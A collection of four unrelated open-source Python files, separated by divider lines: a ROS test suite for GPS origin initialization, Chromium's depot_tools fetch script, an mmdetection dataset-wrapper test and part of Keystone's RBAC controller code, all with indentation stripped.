# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Southwest Research Institute (SwRI) nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL SOUTHWEST RESEARCH INSTITUTE BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import sys
import time
import unittest
from geographic_msgs.msg import GeoPose, GeoPoseStamped
from geometry_msgs.msg import PoseStamped
from gps_common.msg import GPSFix, GPSStatus
from sensor_msgs.msg import NavSatFix, NavSatStatus
import rospy
import rostest
import rostopic
import tf.transformations
PKG = 'swri_transform_util'
NAME = 'test_initialize_origin'
ORIGIN_TOPIC = '/local_xy_origin'
ORIGIN_TYPES = [PoseStamped, GPSFix, GeoPose, GeoPoseStamped]
msg_stamp = rospy.Time(1337, 0xDEADBEEF)
swri = {
'latitude': 29.45196669,
'longitude': -98.61370577,
'altitude': 233.719,
'heading': 90
}
class TestInitializeOrigin(unittest.TestCase):
def subscribeToOrigin(self):
# This line blocks until initialize_origin is alive and has advertised the origin topic
origin_class = rostopic.get_topic_class(ORIGIN_TOPIC, blocking=True)[0]
rospy.loginfo("Origin is a " + origin_class._type + " message")
self.assertIsNotNone(origin_class, msg=ORIGIN_TOPIC+" was never advertised")
self.assertIn(origin_class, ORIGIN_TYPES)
self.test_stamp = False # Enable this for auto origin
self.got_origin = False
return rospy.Subscriber(ORIGIN_TOPIC, origin_class, self.originCallback)
def originCallback(self, msg):
rospy.loginfo("Callback received a " + msg._type + " message.")
self.got_origin = True
if msg._type == PoseStamped._type:
latitude = msg.pose.position.y
longitude = msg.pose.position.x
altitude = msg.pose.position.z
quaternion = (msg.pose.orientation.x,
msg.pose.orientation.y,
msg.pose.orientation.z,
msg.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
yaw = euler[2]
self.assertAlmostEqual(yaw, 0)
elif msg._type == GPSFix._type:
rospy.loginfo("Status: %d" % msg.status.status)
self.assertEqual(msg.status.status, GPSStatus.STATUS_FIX)
latitude = msg.latitude
longitude = msg.longitude
altitude = msg.altitude
self.assertAlmostEqual(msg.track, swri['heading'])
elif msg._type == NavSatFix._type:
rospy.loginfo("Status: %d" % msg.status.status)
self.assertEqual(msg.status.status, NavSatStatus.STATUS_FIX)
latitude = msg.latitude
longitude = msg.longitude
altitude = msg.altitude
else: # msg._type == GeoPose._type:
latitude = msg.position.latitude
longitude = msg.position.longitude
altitude = msg.position.altitude
quaternion = (msg.pose.orientation.x,
msg.pose.orientation.y,
msg.pose.orientation.z,
msg.pose.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
yaw = euler[2]
self.assertAlmostEqual(yaw, 0)
self.assertEqual(msg.header.frame_id, '/far_field')
if self.test_stamp:
self.assertEqual(msg.header.stamp, msg_stamp)
else:
self.assertNotEqual(msg.header.stamp, rospy.Time(0))
self.assertAlmostEqual(longitude, swri['longitude'])
self.assertAlmostEqual(latitude, swri['latitude'])
self.assertAlmostEqual(altitude, swri['altitude'])
rospy.signal_shutdown("Test complete")
class TestInvalidOrigin(unittest.TestCase):
def subscribeToOrigin(self):
# This line blocks until initialize_origin is alive and has advertised the origin topic
origin_class = rostopic.get_topic_class(ORIGIN_TOPIC, blocking=True)[0]
rospy.loginfo("Origin is a " + origin_class._type + " message")
self.assertIsNotNone(origin_class, msg=ORIGIN_TOPIC + " was never advertised")
self.assertIn(origin_class, ORIGIN_TYPES)
self.test_stamp = False # Enable this for auto origin
self.got_message = False
return rospy.Subscriber(ORIGIN_TOPIC, origin_class, self.originCallback)
def originCallback(self, msg):
rospy.logerr("Callback received a " + msg._type + " message.")
self.got_message = True
rospy.signal_shutdown("Test complete")
class TestAutoOriginFromGPSFix(TestInitializeOrigin):
def testAutoOriginFromGPSFix(self):
rospy.init_node('test_auto_origin_from_gps_fix')
gps_pub = rospy.Publisher('gps', GPSFix, queue_size=2, latch=True)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
gps_msg = GPSFix()
gps_msg.status.status = GPSStatus.STATUS_FIX
gps_msg.latitude = swri['latitude']
gps_msg.longitude = swri['longitude']
gps_msg.altitude = swri['altitude']
gps_msg.track = swri['heading']
gps_msg.header.stamp = msg_stamp
gps_pub.publish(gps_msg)
rospy.spin()
self.assertTrue(self.got_origin)
class TestInvalidGPSFix(TestInvalidOrigin):
def testInvalidGPSFix(self):
rospy.init_node('test_invalid_gps_fix')
gps_pub = rospy.Publisher('gps', GPSFix, queue_size=2)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
gps_msg = GPSFix()
gps_msg.status.status = GPSStatus.STATUS_NO_FIX
gps_msg.header.stamp = msg_stamp
# There are two ways in which initialize_origin.py could fail due to getting
# an invalid fix: if it publishes an origin despite not getting a valid fix
# or if it unsubscribes from the gps & fix topics without ever publishing
# an origin.
# This will test for those conditions by waiting until the node has
# subscribed to the topic, then failing if either ROS shuts down, which
# our subscriber will do if it gets an origin message, or if the number of
# connections drops to zero, which means initialize_origin.py subscribed
# but did not publish a message.
r = rospy.Rate(100.0)
timeout = time.time() + 2 # time out after 2 seconds, which should be plenty
node_attached = False
while not rospy.is_shutdown() and time.time() < timeout:
if not node_attached and gps_pub.get_num_connections() > 0:
node_attached = True
if node_attached and gps_pub.get_num_connections() == 0:
break
gps_pub.publish(gps_msg)
r.sleep()
self.assertFalse(self.got_message,
"initialize_origin should not have published an origin.")
self.assertFalse(node_attached and gps_pub.get_num_connections() == 0,
"initialize_origin unsubscribed without getting a valid fix.")
class TestAutoOriginFromNavSatFix(TestInitializeOrigin):
def testAutoOriginFromNavSatFix(self):
rospy.init_node('test_auto_origin_from_nav_sat_fix')
nsf_pub = rospy.Publisher('fix', NavSatFix, queue_size=2, latch=True)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
nsf_msg = NavSatFix()
nsf_msg.status.status = NavSatStatus.STATUS_FIX
nsf_msg.latitude = swri['latitude']
nsf_msg.longitude = swri['longitude']
nsf_msg.altitude = swri['altitude']
nsf_msg.header.frame_id = "/far_field"
nsf_msg.header.stamp = msg_stamp
nsf_pub.publish(nsf_msg)
rospy.spin()
self.assertTrue(self.got_origin)
class TestInvalidNavSatFix(TestInvalidOrigin):
def testInvalidNavSatFix(self):
rospy.init_node('test_invalid_nav_sat_fix')
nsf_pub = rospy.Publisher('fix', NavSatFix, queue_size=2)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
nsf_msg = NavSatFix()
nsf_msg.status.status = NavSatStatus.STATUS_NO_FIX
nsf_msg.header.frame_id = "/far_field"
nsf_msg.header.stamp = msg_stamp
# See documentation in testInvalidGPSFix.
r = rospy.Rate(100.0)
timeout = time.time() + 2 # time out after 2 seconds, which should be plenty
node_attached = False
while not rospy.is_shutdown() and time.time() < timeout:
if not node_attached and nsf_pub.get_num_connections() > 0:
node_attached = True
if node_attached and nsf_pub.get_num_connections() == 0:
break
nsf_pub.publish(nsf_msg)
r.sleep()
self.assertFalse(self.got_message,
"initialize_origin should not have published an origin.")
self.assertFalse(node_attached and nsf_pub.get_num_connections() == 0,
"initialize_origin unsubscribed without getting a valid fix.")
class TestAutoOriginFromCustom(TestInitializeOrigin):
def testAutoOriginFromCustom(self):
rospy.init_node('test_auto_origin_from_custom')
custom_pub = rospy.Publisher('pose', GeoPoseStamped, queue_size=2, latch=True)
origin_sub = self.subscribeToOrigin()
self.test_stamp = True
custom_msg = GeoPoseStamped()
custom_msg.pose.position.latitude = swri['latitude']
custom_msg.pose.position.longitude = swri['longitude']
custom_msg.pose.position.altitude = swri['altitude']
custom_msg.header.frame_id = "/far_field"
custom_msg.header.stamp = msg_stamp
custom_pub.publish(custom_msg)
rospy.spin()
self.assertTrue(self.got_origin)
class TestManualOrigin(TestInitializeOrigin):
def testManualOrigin(self):
rospy.init_node('test_manual_origin')
origin_sub = self.subscribeToOrigin()
rospy.spin()
self.assertTrue(self.got_origin)
if __name__ == "__main__":
if sys.argv[1] == "auto_custom":
rostest.rosrun(PKG, NAME, TestAutoOriginFromCustom, sys.argv)
elif sys.argv[1] == "auto_gps":
rostest.rosrun(PKG, NAME, TestAutoOriginFromGPSFix, sys.argv)
elif sys.argv[1] == "auto_navsat":
rostest.rosrun(PKG, NAME, TestAutoOriginFromNavSatFix, sys.argv)
elif sys.argv[1] == "invalid_gps":
rostest.rosrun(PKG, NAME, TestInvalidGPSFix, sys.argv)
elif sys.argv[1] == "invalid_navsat":
rostest.rosrun(PKG, NAME, TestInvalidNavSatFix, sys.argv)
elif sys.argv[1] == "manual":
rostest.rosrun(PKG, NAME, TestManualOrigin, sys.argv)
|
|
#!/usr/bin/env vpython
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tool to perform checkouts in one easy command line!
Usage:
fetch <config> [--property=value [--property2=value2 ...]]
This script is a wrapper around various version control and repository
checkout commands. It requires a |config| name, fetches data from that
config in depot_tools/fetch_configs, and then performs all necessary inits,
checkouts, pulls, fetches, etc.
Optional arguments may be passed on the command line in key-value pairs.
These parameters will be passed through to the config's main method.
"""
from __future__ import print_function
import json
import optparse
import os
import pipes
import subprocess
import sys
import textwrap
import git_common
from distutils import spawn
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))
#################################################
# Checkout class definitions.
#################################################
class Checkout(object):
"""Base class for implementing different types of checkouts.
Attributes:
|base|: the absolute path of the directory in which this script is run.
|spec|: the spec for this checkout as returned by the config. Different
subclasses will expect different keys in this dictionary.
|root|: the directory into which the checkout will be performed, as returned
by the config. This is a relative path from |base|.
"""
def __init__(self, options, spec, root):
self.base = os.getcwd()
self.options = options
self.spec = spec
self.root = root
def exists(self):
"""Check does this checkout already exist on desired location"""
pass
def init(self):
pass
def run(self, cmd, return_stdout=False, **kwargs):
print('Running: %s' % (' '.join(pipes.quote(x) for x in cmd)))
if self.options.dry_run:
return ''
if return_stdout:
return subprocess.check_output(cmd, **kwargs).decode()
else:
try:
subprocess.check_call(cmd, **kwargs)
except subprocess.CalledProcessError as e:
# If the subprocess failed, it likely emitted its own distress message
# already - don't scroll that message off the screen with a stack trace
# from this program as well. Emit a terse message and bail out here;
# otherwise a later step will try doing more work and may hide the
# subprocess message.
print('Subprocess failed with return code %d.' % e.returncode)
sys.exit(e.returncode)
return ''
class GclientCheckout(Checkout):
def run_gclient(self, *cmd, **kwargs):
if not spawn.find_executable('gclient'):
cmd_prefix = (sys.executable, os.path.join(SCRIPT_PATH, 'gclient.py'))
else:
cmd_prefix = ('gclient',)
return self.run(cmd_prefix + cmd, **kwargs)
def exists(self):
try:
gclient_root = self.run_gclient('root', return_stdout=True).strip()
return (os.path.exists(os.path.join(gclient_root, '.gclient')) or
os.path.exists(os.path.join(os.getcwd(), self.root)))
except subprocess.CalledProcessError:
pass
return os.path.exists(os.path.join(os.getcwd(), self.root))
class GitCheckout(Checkout):
def run_git(self, *cmd, **kwargs):
print('Running: git %s' % (' '.join(pipes.quote(x) for x in cmd)))
if self.options.dry_run:
return ''
return git_common.run(*cmd, **kwargs)
class GclientGitCheckout(GclientCheckout, GitCheckout):
def __init__(self, options, spec, root):
super(GclientGitCheckout, self).__init__(options, spec, root)
assert 'solutions' in self.spec
def _format_spec(self):
def _format_literal(lit):
if isinstance(lit, str) or (sys.version_info.major == 2 and
isinstance(lit, unicode)):
return '"%s"' % lit
if isinstance(lit, list):
return '[%s]' % ', '.join(_format_literal(i) for i in lit)
return '%r' % lit
soln_strings = []
for soln in self.spec['solutions']:
soln_string = '\n'.join(' "%s": %s,' % (key, _format_literal(value))
for key, value in soln.items())
soln_strings.append(' {\n%s\n },' % soln_string)
gclient_spec = 'solutions = [\n%s\n]\n' % '\n'.join(soln_strings)
extra_keys = ['target_os', 'target_os_only', 'cache_dir']
gclient_spec += ''.join('%s = %s\n' % (key, _format_literal(self.spec[key]))
for key in extra_keys if key in self.spec)
return gclient_spec
def init(self):
# Configure and do the gclient checkout.
self.run_gclient('config', '--spec', self._format_spec())
sync_cmd = ['sync']
if self.options.nohooks:
sync_cmd.append('--nohooks')
if self.options.no_history:
sync_cmd.append('--no-history')
if self.spec.get('with_branch_heads', False):
sync_cmd.append('--with_branch_heads')
self.run_gclient(*sync_cmd)
# Configure git.
wd = os.path.join(self.base, self.root)
if self.options.dry_run:
print('cd %s' % wd)
self.run_git(
'submodule', 'foreach',
'git config -f $toplevel/.git/config submodule.$name.ignore all',
cwd=wd)
if not self.options.no_history:
self.run_git(
'config', '--add', 'remote.origin.fetch',
'+refs/tags/*:refs/tags/*', cwd=wd)
self.run_git('config', 'diff.ignoreSubmodules', 'all', cwd=wd)
CHECKOUT_TYPE_MAP = {
'gclient': GclientCheckout,
'gclient_git': GclientGitCheckout,
'git': GitCheckout,
}
def CheckoutFactory(type_name, options, spec, root):
"""Factory to build Checkout class instances."""
class_ = CHECKOUT_TYPE_MAP.get(type_name)
if not class_:
raise KeyError('unrecognized checkout type: %s' % type_name)
return class_(options, spec, root)
#################################################
# Utility function and file entry point.
#################################################
def usage(msg=None):
"""Print help and exit."""
if msg:
print('Error:', msg)
print(textwrap.dedent("""\
usage: %s [options] <config> [--property=value [--property2=value2 ...]]
This script can be used to download the Chromium sources. See
http://www.chromium.org/developers/how-tos/get-the-code
for full usage instructions.
Valid options:
-h, --help, help Print this message.
--nohooks Don't run hooks after checkout.
--force (dangerous) Don't look for existing .gclient file.
-n, --dry-run Don't run commands, only print them.
--no-history Perform shallow clones, don't fetch the full git history.
Valid fetch configs:""") % os.path.basename(sys.argv[0]))
configs_dir = os.path.join(SCRIPT_PATH, 'fetch_configs')
configs = [f[:-3] for f in os.listdir(configs_dir) if f.endswith('.py')]
configs.sort()
for fname in configs:
print(' ' + fname)
sys.exit(bool(msg))
def handle_args(argv):
"""Gets the config name from the command line arguments."""
if len(argv) <= 1:
usage('Must specify a config.')
if argv[1] in ('-h', '--help', 'help'):
usage()
dry_run = False
nohooks = False
no_history = False
force = False
while len(argv) >= 2:
arg = argv[1]
if not arg.startswith('-'):
break
argv.pop(1)
if arg in ('-n', '--dry-run'):
dry_run = True
elif arg == '--nohooks':
nohooks = True
elif arg == '--no-history':
no_history = True
elif arg == '--force':
force = True
else:
usage('Invalid option %s.' % arg)
def looks_like_arg(arg):
return arg.startswith('--') and arg.count('=') == 1
bad_parms = [x for x in argv[2:] if not looks_like_arg(x)]
if bad_parms:
usage('Got bad arguments %s' % bad_parms)
config = argv[1]
props = argv[2:]
return (
optparse.Values({
'dry_run': dry_run,
'nohooks': nohooks,
'no_history': no_history,
'force': force}),
config,
props)
def run_config_fetch(config, props, aliased=False):
"""Invoke a config's fetch method with the passed-through args
and return its json output as a python object."""
config_path = os.path.abspath(
os.path.join(SCRIPT_PATH, 'fetch_configs', config))
if not os.path.exists(config_path + '.py'):
print("Could not find a config for %s" % config)
sys.exit(1)
cmd = [sys.executable, config_path + '.py', 'fetch'] + props
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
spec = json.loads(result.decode("utf-8"))
if 'alias' in spec:
assert not aliased
return run_config_fetch(
spec['alias']['config'], spec['alias']['props'] + props, aliased=True)
cmd = [sys.executable, config_path + '.py', 'root']
result = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]
root = json.loads(result.decode("utf-8"))
return spec, root
def run(options, spec, root):
"""Perform a checkout with the given type and configuration.
Args:
options: Options instance.
spec: Checkout configuration returned by the the config's fetch_spec
method (checkout type, repository url, etc.).
root: The directory into which the repo expects to be checkout out.
"""
assert 'type' in spec
checkout_type = spec['type']
checkout_spec = spec['%s_spec' % checkout_type]
try:
checkout = CheckoutFactory(checkout_type, options, checkout_spec, root)
except KeyError:
return 1
if not options.force and checkout.exists():
print('Your current directory appears to already contain, or be part of, ')
print('a checkout. "fetch" is used only to get new checkouts. Use ')
print('"gclient sync" to update existing checkouts.')
print()
print('Fetch also does not yet deal with partial checkouts, so if fetch')
print('failed, delete the checkout and start over (crbug.com/230691).')
return 1
return checkout.init()
def main():
options, config, props = handle_args(sys.argv)
spec, root = run_config_fetch(config, props)
return run(options, spec, root)
if __name__ == '__main__':
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(1)
|
|
# Copyright (c) OpenMMLab. All rights reserved.
import bisect
import math
from collections import defaultdict
from unittest.mock import MagicMock
import numpy as np
import pytest
from mmdet.datasets import (ClassBalancedDataset, ConcatDataset, CustomDataset,
MultiImageMixDataset, RepeatDataset)
def test_dataset_wrapper():
CustomDataset.load_annotations = MagicMock()
CustomDataset.__getitem__ = MagicMock(side_effect=lambda idx: idx)
dataset_a = CustomDataset(
ann_file=MagicMock(), pipeline=[], test_mode=True, img_prefix='')
len_a = 10
cat_ids_list_a = [
np.random.randint(0, 80, num).tolist()
for num in np.random.randint(1, 20, len_a)
]
ann_info_list_a = []
for _ in range(len_a):
height = np.random.randint(10, 30)
weight = np.random.randint(10, 30)
img = np.ones((height, weight, 3))
gt_bbox = np.concatenate([
np.random.randint(1, 5, (2, 2)),
np.random.randint(1, 5, (2, 2)) + 5
],
axis=1)
gt_labels = np.random.randint(0, 80, 2)
ann_info_list_a.append(
dict(gt_bboxes=gt_bbox, gt_labels=gt_labels, img=img))
dataset_a.data_infos = MagicMock()
dataset_a.data_infos.__len__.return_value = len_a
dataset_a.get_cat_ids = MagicMock(
side_effect=lambda idx: cat_ids_list_a[idx])
dataset_a.get_ann_info = MagicMock(
side_effect=lambda idx: ann_info_list_a[idx])
dataset_b = CustomDataset(
ann_file=MagicMock(), pipeline=[], test_mode=True, img_prefix='')
len_b = 20
cat_ids_list_b = [
np.random.randint(0, 80, num).tolist()
for num in np.random.randint(1, 20, len_b)
]
ann_info_list_b = []
for _ in range(len_b):
height = np.random.randint(10, 30)
weight = np.random.randint(10, 30)
img = np.ones((height, weight, 3))
gt_bbox = np.concatenate([
np.random.randint(1, 5, (2, 2)),
np.random.randint(1, 5, (2, 2)) + 5
],
axis=1)
gt_labels = np.random.randint(0, 80, 2)
ann_info_list_b.append(
dict(gt_bboxes=gt_bbox, gt_labels=gt_labels, img=img))
dataset_b.data_infos = MagicMock()
dataset_b.data_infos.__len__.return_value = len_b
dataset_b.get_cat_ids = MagicMock(
side_effect=lambda idx: cat_ids_list_b[idx])
dataset_b.get_ann_info = MagicMock(
side_effect=lambda idx: ann_info_list_b[idx])
concat_dataset = ConcatDataset([dataset_a, dataset_b])
assert concat_dataset[5] == 5
assert concat_dataset[25] == 15
assert concat_dataset.get_cat_ids(5) == cat_ids_list_a[5]
assert concat_dataset.get_cat_ids(25) == cat_ids_list_b[15]
assert concat_dataset.get_ann_info(5) == ann_info_list_a[5]
assert concat_dataset.get_ann_info(25) == ann_info_list_b[15]
assert len(concat_dataset) == len(dataset_a) + len(dataset_b)
# Test if ConcatDataset allows dataset classes without the PALETTE
# attribute
palette_backup = CustomDataset.PALETTE
delattr(CustomDataset, 'PALETTE')
concat_dataset = ConcatDataset([dataset_a, dataset_b])
assert concat_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
repeat_dataset = RepeatDataset(dataset_a, 10)
assert repeat_dataset[5] == 5
assert repeat_dataset[15] == 5
assert repeat_dataset[27] == 7
assert repeat_dataset.get_cat_ids(5) == cat_ids_list_a[5]
assert repeat_dataset.get_cat_ids(15) == cat_ids_list_a[5]
assert repeat_dataset.get_cat_ids(27) == cat_ids_list_a[7]
assert repeat_dataset.get_ann_info(5) == ann_info_list_a[5]
assert repeat_dataset.get_ann_info(15) == ann_info_list_a[5]
assert repeat_dataset.get_ann_info(27) == ann_info_list_a[7]
assert len(repeat_dataset) == 10 * len(dataset_a)
# Test if RepeatDataset allows dataset classes without the PALETTE
# attribute
delattr(CustomDataset, 'PALETTE')
repeat_dataset = RepeatDataset(dataset_a, 10)
assert repeat_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
category_freq = defaultdict(int)
for cat_ids in cat_ids_list_a:
cat_ids = set(cat_ids)
for cat_id in cat_ids:
category_freq[cat_id] += 1
for k, v in category_freq.items():
category_freq[k] = v / len(cat_ids_list_a)
mean_freq = np.mean(list(category_freq.values()))
repeat_thr = mean_freq
category_repeat = {
cat_id: max(1.0, math.sqrt(repeat_thr / cat_freq))
for cat_id, cat_freq in category_freq.items()
}
repeat_factors = []
for cat_ids in cat_ids_list_a:
cat_ids = set(cat_ids)
repeat_factor = max({category_repeat[cat_id] for cat_id in cat_ids})
repeat_factors.append(math.ceil(repeat_factor))
repeat_factors_cumsum = np.cumsum(repeat_factors)
repeat_factor_dataset = ClassBalancedDataset(dataset_a, repeat_thr)
assert len(repeat_factor_dataset) == repeat_factors_cumsum[-1]
for idx in np.random.randint(0, len(repeat_factor_dataset), 3):
assert repeat_factor_dataset[idx] == bisect.bisect_right(
repeat_factors_cumsum, idx)
assert repeat_factor_dataset.get_ann_info(idx) == ann_info_list_a[
bisect.bisect_right(repeat_factors_cumsum, idx)]
# Test if ClassBalancedDataset allows dataset classes without the PALETTE
# attribute
delattr(CustomDataset, 'PALETTE')
repeat_factor_dataset = ClassBalancedDataset(dataset_a, repeat_thr)
assert repeat_factor_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
img_scale = (60, 60)
pipeline = [
dict(type='Mosaic', img_scale=img_scale, pad_val=114.0),
dict(
type='RandomAffine',
scaling_ratio_range=(0.1, 2),
border=(-img_scale[0] // 2, -img_scale[1] // 2)),
dict(
type='MixUp',
img_scale=img_scale,
ratio_range=(0.8, 1.6),
pad_val=114.0),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Resize', img_scale=img_scale, keep_ratio=True),
dict(type='Pad', pad_to_square=True, pad_val=114.0),
]
CustomDataset.load_annotations = MagicMock()
results = []
for _ in range(2):
height = np.random.randint(10, 30)
weight = np.random.randint(10, 30)
img = np.ones((height, weight, 3))
gt_bbox = np.concatenate([
np.random.randint(1, 5, (2, 2)),
np.random.randint(1, 5, (2, 2)) + 5
],
axis=1)
gt_labels = np.random.randint(0, 80, 2)
results.append(dict(gt_bboxes=gt_bbox, gt_labels=gt_labels, img=img))
CustomDataset.__getitem__ = MagicMock(side_effect=lambda idx: results[idx])
dataset_a = CustomDataset(
ann_file=MagicMock(), pipeline=[], test_mode=True, img_prefix='')
len_a = 2
cat_ids_list_a = [
np.random.randint(0, 80, num).tolist()
for num in np.random.randint(1, 20, len_a)
]
dataset_a.data_infos = MagicMock()
dataset_a.data_infos.__len__.return_value = len_a
dataset_a.get_cat_ids = MagicMock(
side_effect=lambda idx: cat_ids_list_a[idx])
# test dynamic_scale deprecated
with pytest.raises(RuntimeError):
MultiImageMixDataset(dataset_a, pipeline, (80, 80))
multi_image_mix_dataset = MultiImageMixDataset(dataset_a, pipeline)
for idx in range(len_a):
results_ = multi_image_mix_dataset[idx]
assert results_['img'].shape == (img_scale[0], img_scale[1], 3)
# test skip_type_keys
multi_image_mix_dataset = MultiImageMixDataset(
dataset_a,
pipeline,
skip_type_keys=('MixUp', 'RandomFlip', 'Resize', 'Pad'))
for idx in range(len_a):
results_ = multi_image_mix_dataset[idx]
assert results_['img'].shape == (img_scale[0], img_scale[1], 3)
# Test if MultiImageMixDataset allows dataset classes without the PALETTE
# attribute
delattr(CustomDataset, 'PALETTE')
multi_image_mix_dataset = MultiImageMixDataset(dataset_a, pipeline)
assert multi_image_mix_dataset.PALETTE is None
CustomDataset.PALETTE = palette_backup
|
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import uuid
import six
from keystone.common import authorization
from keystone.common import dependency
from keystone.common import driver_hints
from keystone.common import utils
from keystone.common import wsgi
from keystone import config
from keystone import exception
from keystone.i18n import _
from keystone.models import token_model
from keystone.openstack.common import log
LOG = log.getLogger(__name__)
CONF = config.CONF
def v2_deprecated(f):
"""No-op decorator in preparation for deprecating Identity API v2.
This is a placeholder for the pending deprecation of v2. The implementation
of this decorator can be replaced with::
from keystone.openstack.common import versionutils
v2_deprecated = versionutils.deprecated(
what='v2 API',
as_of=versionutils.deprecated.JUNO,
in_favor_of='v3 API')
"""
return f
def _build_policy_check_credentials(self, action, context, kwargs):
LOG.debug('RBAC: Authorizing %(action)s(%(kwargs)s)', {
'action': action,
'kwargs': ', '.join(['%s=%s' % (k, kwargs[k]) for k in kwargs])})
# see if auth context has already been created. If so use it.
if ('environment' in context and
authorization.AUTH_CONTEXT_ENV in context['environment']):
LOG.debug('RBAC: using auth context from the request environment')
return context['environment'].get(authorization.AUTH_CONTEXT_ENV)
# There is no current auth context, build it from the incoming token.
# TODO(morganfainberg): Collapse this logic with AuthContextMiddleware
# in a sane manner as this just mirrors the logic in AuthContextMiddleware
try:
LOG.debug('RBAC: building auth context from the incoming auth token')
token_ref = token_model.KeystoneToken(
token_id=context['token_id'],
token_data=self.token_provider_api.validate_token(
context['token_id']))
# NOTE(jamielennox): whilst this maybe shouldn't be within this
# function it would otherwise need to reload the token_ref from
# backing store.
wsgi.validate_token_bind(context, token_ref)
except exception.TokenNotFound:
LOG.warning(_('RBAC: Invalid token'))
raise exception.Unauthorized()
auth_context = authorization.token_to_auth_context(token_ref)
return auth_context
def protected(callback=None):
"""Wraps API calls with role based access controls (RBAC).
This handles both the protection of the API parameters as well as any
target entities for single-entity API calls.
More complex API calls (for example that deal with several different
entities) should pass in a callback function, that will be subsequently
called to check protection for these multiple entities. This callback
function should gather the appropriate entities needed and then call
check_protection() in the V3Controller class.
"""
def wrapper(f):
@functools.wraps(f)
def inner(self, context, *args, **kwargs):
if 'is_admin' in context and context['is_admin']:
LOG.warning(_('RBAC: Bypassing authorization'))
elif callback is not None:
prep_info = {'f_name': f.__name__,
'input_attr': kwargs}
callback(self, context, prep_info, *args, **kwargs)
else:
action = 'identity:%s' % f.__name__
creds = _build_policy_check_credentials(self, action,
context, kwargs)
policy_dict = {}
# Check to see if we need to include the target entity in our
# policy checks. We deduce this by seeing if the class has
# specified a get_member() method and that kwargs contains the
# appropriate entity id.
if (hasattr(self, 'get_member_from_driver') and
self.get_member_from_driver is not None):
key = '%s_id' % self.member_name
if key in kwargs:
ref = self.get_member_from_driver(kwargs[key])
policy_dict['target'] = {self.member_name: ref}
# TODO(henry-nash): Move this entire code to a member
# method inside v3 Auth
if context.get('subject_token_id') is not None:
token_ref = token_model.KeystoneToken(
token_id=context['subject_token_id'],
token_data=self.token_provider_api.validate_token(
context['subject_token_id']))
policy_dict.setdefault('target', {})
policy_dict['target'].setdefault(self.member_name, {})
policy_dict['target'][self.member_name]['user_id'] = (
token_ref.user_id)
try:
user_domain_id = token_ref.user_domain_id
except exception.UnexpectedError:
user_domain_id = None
if user_domain_id:
policy_dict['target'][self.member_name].setdefault(
'user', {})
policy_dict['target'][self.member_name][
'user'].setdefault('domain', {})
policy_dict['target'][self.member_name]['user'][
'domain']['id'] = (
user_domain_id)
# Add in the kwargs, which means that any entity provided as a
# parameter for calls like create and update will be included.
policy_dict.update(kwargs)
self.policy_api.enforce(creds,
action,
utils.flatten_dict(policy_dict))
LOG.debug('RBAC: Authorization granted')
return f(self, context, *args, **kwargs)
return inner
return wrapper
def filterprotected(*filters):
"""Wraps filtered API calls with role based access controls (RBAC)."""
def _filterprotected(f):
@functools.wraps(f)
def wrapper(self, context, **kwargs):
if not context['is_admin']:
action = 'identity:%s' % f.__name__
creds = _build_policy_check_credentials(self, action,
context, kwargs)
# Now, build the target dict for policy check. We include:
#
# - Any query filter parameters
# - Data from the main url (which will be in the kwargs
# parameter) and would typically include the prime key
# of a get/update/delete call
#
# First any query filter parameters
target = dict()
if filters:
for item in filters:
if item in context['query_string']:
target[item] = context['query_string'][item]
LOG.debug('RBAC: Adding query filter params (%s)', (
', '.join(['%s=%s' % (item, target[item])
for item in target])))
# Now any formal url parameters
for key in kwargs:
target[key] = kwargs[key]
self.policy_api.enforce(creds,
action,
utils.flatten_dict(target))
LOG.debug('RBAC: Authorization granted')
else:
LOG.warning(_('RBAC: Bypassing authorization'))
return f(self, context, filters, **kwargs)
return wrapper
return _filterprotected
class V2Controller(wsgi.Application):
"""Base controller class for Identity API v2."""
def _normalize_domain_id(self, context, ref):
"""Fill in domain_id since v2 calls are not domain-aware.
This will overwrite any domain_id that was inadvertently
specified in the v2 call.
"""
ref['domain_id'] = CONF.identity.default_domain_id
